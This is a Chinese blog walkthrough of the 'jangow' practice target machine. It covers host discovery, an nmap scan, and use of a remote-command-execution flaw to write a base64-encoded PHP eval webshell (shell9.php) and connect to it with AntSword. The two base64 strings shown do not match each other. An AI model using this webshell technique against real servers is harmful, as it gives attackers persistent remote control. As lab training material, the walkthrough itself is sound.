當前位置:網站首頁>jangow靶機滲透
jangow靶機滲透
2022-01-28 14:08:11 【qq_42307546】
今天給大家帶來一個簡單難度的靶機
首先主機掃描
netdiscover -i eth0 192.168.1.1/24
掃出靶機地址為
192.168.1.13
nmap 掃描
nmap -sV -p 0-6550 192.168.1.13
Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-23 14:13 CST
Nmap scan report for 192.168.1.13
Host is up (0.00071s latency).
Not shown: 6549 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
MAC Address: 00:0C:29:59:F7:8E (VMware)
Service Info: Host: 127.0.0.1; OS: Unix
直接訪問80端口,發現busque頁面存在rce
直接通過echo命令base64編碼下寫入一句話
將這段代碼進行base64編碼
PD9AZXZhbCgkX1BPU1RbJ21vb24nXSk7Pz4g
通過echo 命令寫入
echo “PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Cj8+”|base64 -d >shell9.php
蟻劍連接,獲取flag
版權聲明
本文為[qq_42307546]所創,轉載請帶上原文鏈接,感謝
https://cht.chowdera.com/2022/01/202201281408114297.html
邊欄推薦
猜你喜歡
隨機推薦
- uniapp上傳圖片及組件傳值
- 瑞利年金險資金保障安全嗎?收益高不高啊?
- 華為手機USB連不上電腦的解决方法
- Flutter 2,移動金融應用開發
- 關於st25系列NFC標簽簡單介紹及st25TV系列用於門禁讀取時的注意事項總結
- 關於用ffmpeg轉手機視頻發現視頻長寬倒了的問題
- 函數 / 類模板--模板2
- 數組中的第k個最大的元素--優先級隊列、排序、堆、排序
- 單片機實例27——ADC0809A/D轉換器基本應用技術(硬件電路圖+匯編程序+C語言程序)
- Collection集合的學習
- 一場面試結束,某度員工從事Android 5年為何還是初級工程師?
- 3本書閱讀筆記【人月神話-Go語言實戰-研發能力持續成長路線】01
- PHP垃圾回收機制
- 【電子技術】什麼是LFSR?
- 死鎖?如何定比特到死鎖?如何修複死鎖?(jps和jstack兩個工具)
- 快樂寒假 22/01/20
- image
- 噴程序員?SURE?
- LDO分壓電阻計算小工具
- 面試之求一串字符串中每個字符的出現次數
- 【ISO15765_UDS&OBD診斷】-01-概述
- 【Mysql上分之路】第九篇:Mysql存儲引擎
- RHCE 第一次作業
- 2021.10.16我的第一篇博客:一切皆有可能!
- CTA-敏感行為-讀取IMEI
- 面試被問怎麼排查平時遇到的系統CPU飆高和頻繁GC,該怎麼回答?
- nuxt項目總結-綜合
- 自然語言處理學習筆記(一)
- C語言第一課
- 各比特大佬,Spark的重點難點系列暫時更新完畢
- 基於 esbuild 的 universal bundler 設計
- XCTFre逆向(四):insanity
- 理解什麼是真正的並發數
- JVM腦圖
- 【Pytorch(四)】學習如何使用 PyTorch 讀取並處理數據集
- 函數棧幀的創建與銷毀
- 構建神經網絡- 手寫字體識別案例
- 多模態生成模型ERNIE-VILG
- kotlin不容忽視的小細節
- 備戰一年,終於斬獲騰訊T3,我堅信成功是可以複制的